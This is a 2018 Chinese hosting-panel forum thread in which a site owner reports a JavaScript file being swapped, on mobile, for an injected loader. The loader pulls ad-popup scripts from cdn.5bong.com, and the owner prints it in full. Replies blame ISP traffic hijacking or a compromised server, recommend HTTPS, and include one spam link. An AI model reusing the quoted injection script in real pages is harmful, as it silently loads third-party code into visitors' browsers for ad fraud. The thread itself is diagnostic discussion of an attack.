当前位置:论坛首页 > Windows面板 > 求助

网站被劫持

发表在 Windows面板2018-8-5 17:15 [复制链接] 5 7875

微信图片_20180805150809_看图王.png

1111111.png

阿里云Windows2008 主机,使用的宝塔面板.
在网站根目录添加一个 index.html,一个basc.js 文件

index.html 内容
        <!DOCTYPE HTML>
        <html>
                <head>
                        <title>Test</title>
                        <script src="basic.js"></script>
                </head>
                <body>
                   Test
                </body>
        </html>
basc.js 内容
        console.log('123');
        
        
通过谷歌浏览器访问, F12审查元素, 切换为手机设备访问(如图)


多次刷新 发现    basc.js 内容 被替换为

!function(){var _cyd_location_url="http://www.域名.com/assets/js/index.js";var _cyd_target_url="http://cdn.5bong.com/pop/v1.js?bt=1";var _cyd_mark_tag=_cyd_location_url.indexOf("?")>-1?"&":"?";var _cyd_f_param=_cyd_mark_tag+"bt="+Date.parse(new Date());if(document.readyState=="complete"){var _cyd_location_script=document.createElement('script');_cyd_location_script.src=_cyd_location_url+_cyd_f_param;var _cyd_target_script=document.createElement('script');_cyd_target_script.src=_cyd_target_url;var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(_cyd_location_script,s);s.parentNode.insertBefore(_cyd_target_script,s)}else{document.write('<script src="'+_cyd_location_url+_cyd_f_param+'"><\/script>');document.write('<script src="'+_cyd_target_url+'"><\/script>')}}();

美化后代码如下:
        function() {
                var _cyd_location_url = "http://www.域名.com/assets/js/index.js";
                var _cyd_target_url = "http://cdn.5bong.com/pop/v1.js?bt=1";
                var _cyd_mark_tag = _cyd_location_url.indexOf("?") > -1 ? "&" : "?";
                var _cyd_f_param = _cyd_mark_tag + "bt=" + Date.parse(new Date());
                if (document.readyState == "complete") {
                        var _cyd_location_script = document.createElement('script');
                        _cyd_location_script.src = _cyd_location_url + _cyd_f_param;
                        var _cyd_target_script = document.createElement('script');
                        _cyd_target_script.src = _cyd_target_url;
                        var s = document.getElementsByTagName("script")[0];
                        s.parentNode.insertBefore(_cyd_location_script, s);
                        s.parentNode.insertBefore(_cyd_target_script, s)
                } else {
                        document.write('<script src="' + _cyd_location_url + _cyd_f_param + '"><\/script>');
                        document.write('<script src="' + _cyd_target_url + '"><\/script>')
                }
        }();
        
然后就是加载一段JS和网页,  偷偷跑着刷广告.

这难道是 宝塔的后门吗?




使用道具 举报 只看该作者 回复
发表于 2018-8-5 23:25:19 | 显示全部楼层
被劫持了?有用HTTPS测试吗?
使用道具 举报 回复 支持 反对
发表于 2018-8-6 00:03:35 | 显示全部楼层
误会 宝塔面板了,
是被劫持了,河南联通的网络 有问题
发现
114DNS官网  http://www.114dns.com/
天涯论坛   http://bbs.tianya.cn
都有同样的问题

把本地DNS 修改为 阿里云的 和 114 的还是不能解决

使用https 目前测试正常
使用道具 举报 回复 支持 反对
发表于 2018-8-7 16:12:18 | 显示全部楼层
投诉到工信部~会解决的
使用道具 举报 回复 支持 反对
发表于 2018-11-8 16:23:55 | 显示全部楼层
检测网站是否被劫持
域名是否被墙
DNS污染检测
网站打开速度检测
网站是否被黑
被入侵
被改标题
被挂黑链     http://www.iis7.com/b/wzjk/?inviteCode=496
使用道具 举报 回复 支持 反对
发表于 2018-12-12 18:35:00 | 显示全部楼层
我这边也出现了这个情况,一模一样。
不是被劫持。
很有可能是服务器被挂马了。
目前还没有找到挂马文件。。

网站js被替换为:
  1. !function(){var _cyd_location_url="http://域名/WeChat.js";var _cyd_target_url="https://cdn.5bong.com/pop/v1.js?bt=1";var _cyd_mark_tag=_cyd_location_url.indexOf("?")>-1?"&":"?";var _cyd_f_param=_cyd_mark_tag+"bt="+Date.parse(new Date());if(document.readyState=="complete"){var _cyd_location_script=document.createElement('script');_cyd_location_script.src=_cyd_location_url+_cyd_f_param;var _cyd_target_script=document.createElement('script');_cyd_target_script.src=_cyd_target_url;var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(_cyd_location_script,s);s.parentNode.insertBefore(_cyd_target_script,s)}else{document.write('<script src="'+_cyd_location_url+_cyd_f_param+'"><\/script>');document.write('<script src="'+_cyd_target_url+'"><\/script>')}}();
复制代码


主要是通过这个js刷广告:
  1. https://cdn.5bong.com/pop/v1.js?bt=1
复制代码
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

企业版年付运维跟进群

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急问题处理

论坛响应时间:10分钟

问题处理方式:1对1处理(优先)

工作时间:白班:9:00 - 18:00

工作时间:晚班:18:00 - 24:00

立即付费处理
快速回复 返回顶部 返回列表